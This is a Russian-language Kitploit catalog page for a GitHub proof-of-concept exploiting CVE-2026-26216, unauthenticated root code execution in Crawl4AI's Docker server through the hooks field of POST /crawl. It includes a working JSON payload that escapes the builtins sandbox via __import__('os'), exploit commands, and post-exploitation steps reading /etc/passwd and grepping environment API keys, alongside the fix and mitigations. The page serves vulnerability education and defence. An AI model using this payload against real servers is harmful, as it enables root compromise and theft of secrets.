Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
EXPLOIT-CVE-2026-26216 — Эксплойт Proof-of-Concept для CVE-2026-26216, демонстрирующий неаутентифицированное удалённое выполнение кода через внедрение хука в Docker-развёртывании Crawl4AI. Включает уязвимую лабораторную среду. | Kitploit
Инструменты/GitHubGitHub/joaovicdev/exploit-cve-2026-26216
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеРазработка Полезной НагрузкиЛаборатории и Практика
GitHubjoaovicdev/exploit-cve-2026-26216

EXPLOIT-CVE-2026-26216

Эксплойт Proof-of-Concept для CVE-2026-26216, демонстрирующий неаутентифицированное удалённое выполнение кода через внедрение хука в Docker-развёртывании Crawl4AI. Включает уязвимую лабораторную среду.

Репозиторий
25 дней назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-26216 — RCE без аутентификации в Crawl4AI через hooks (GHSA-5882-5rx9-xgxp)

CVSS 10.0 · RCE до аутентификации · CWE-94 (Code Injection) Неаутентифицированное удалённое выполнение кода на Docker-сервере Crawl4AI (< 0.8.0) через злоупотребление параметром hooks эндпоинта POST /crawl. Один-единственный JSON в POST выполняет Python от имени root внутри контейнера.

Это лабораторная PoC, автономная и воспроизводимая, для исследования безопасности и образовательных целей.


Уязвимость в одной фразе

Эндпоинт POST /crawl принимает произвольный код Python в поле hooks.code.<evento>. Этот код выполняется с помощью exec() внутри «самодельной песочницы» — словаря ограниченных builtins. Вот только , что позволяет и обходит всю песочницу.

__import__ остался в allowlist
__import__('os').system(...)
root@kitploit:~
POST /crawl
{
  "urls": ["https://example.com"],
  "hooks": {
    "code": {
      "on_page_context_created":
        "async def hook(page, context, **kwargs):\n    __import__('os').system('id')\n    return page"
    }
  }
}

Поскольку официальный деплой работает с отключённым по умолчанию JWT, а контейнер работает от root, результат — root RCE без аутентификации.

Почему это идеальный урок о «самодельной песочнице в инструменте ИИ»

Песочница кажется работающей: open, eval, exec удалены, поэтому наивная атака (open('/etc/passwd')) блокируется. Это создаёт ложное чувство безопасности. Но достаточно одного забытого опасного builtin (__import__), чтобы импортировать всю stdlib (os, subprocess, socket), и allowlist превращается в декорацию. Allowlist builtins — это не песочница.


Структура проекта

root@kitploit:~
CVE-2026-26216/
├── README.md
├── docker-compose.yml         # sobe o servidor vulnerável
├── vulnerable-app/
│   ├── Dockerfile             # imagem que roda como root (igual à oficial)
│   ├── requirements.txt
│   ├── server.py              # FastAPI: POST /crawl sem auth
│   └── hook_manager.py        # o sandbox fraco (a linha vulnerável está aqui)
└── exploit/
    └── exploit.py             # exploit Python (só stdlib)

Примечание о достоверности. vulnerable-app/ — это облегчённая репродукция уязвимого пути кода Crawl4AI (не открывает Chromium/Playwright), чтобы PoC была лёгкой и на 100% воспроизводимой. Поведение песочницы и структура payload повторяют официальный advisory GHSA-5882-5rx9-xgxp. Уязвимая строка отмечена в vulnerable-app/hook_manager.py.


Как запустить

root@kitploit:~
# 1. sobe o alvo
docker compose up -d --build

# 2. demonstração completa
python3 exploit/exploit.py --target http://localhost:11235 --demo

# 3. comando arbitrário
python3 exploit/exploit.py --target http://localhost:11235 --cmd "id; hostname; env"

# 4. derruba
docker compose down -v

Что демонстрирует эксплойт

#ДействиеРезультат
1open('/etc/passwd') напрямуюЗаблокировано песочницей (ложная безопасность)
2__import__('subprocess') + id/whoamiRCE с правами root
3cat /etc/passwd через shellПроизвольное чтение файлов
4env | grep KEYЭксфильтрация API-ключей / токенов
5echo ... > /tmp/PWNEDПроизвольная запись файлов

Дальше: пивот во внутреннюю сеть, кража облачных учётных данных, персистентность и т.д.


Воздействие

  • Конфиденциальность: кража OPENAI_API_KEY, внутренних токенов, секретов контейнера.
  • Целостность: запись/изменение файлов, бэкдоры.
  • Доступность: завершение процессов, стирание данных.
  • Горизонтальное перемещение: контейнер обычно имеет доступ к внутренней сети → пивот.

Всё это без аутентификации.


Исправление

Исправлено в Crawl4AI 0.8.0:

  • __import__ (и eval/exec/open) удалены из разрешённых builtins.
  • Хуки отключены по умолчанию — явное включение через CRAWL4AI_HOOKS_ENABLED=true.

Общие меры защиты:

  • Обновитесь до crawl4ai >= 0.8.0.
  • Никогда не выставляйте сервер Crawl4AI напрямую в интернет; включите JWT.
  • Не запускайте контейнер от root; используйте непривилегированного пользователя и read-only FS.
  • Относитесь к «allowlist builtins» как к тому, чем он является: это не песочница. Для выполнения недоверенного кода используйте настоящую изоляцию (gVisor, microVM, отдельный процесс без сети/ФС, seccomp).

Ссылки

  • GitHub Advisory — GHSA-5882-5rx9-xgxp
  • GitHub Advisory Database
  • Corgea — CVE-2026-26216
  • GitLab Advisory Database
  • miggo.io — GHSA-5882-5rx9-xgxp

Правовое уведомление

Материал для авторизованных исследований безопасности и образования. Используйте только на системах, которыми вы владеете или на тестирование которых у вас есть явное письменное разрешение.

Скачать инструмент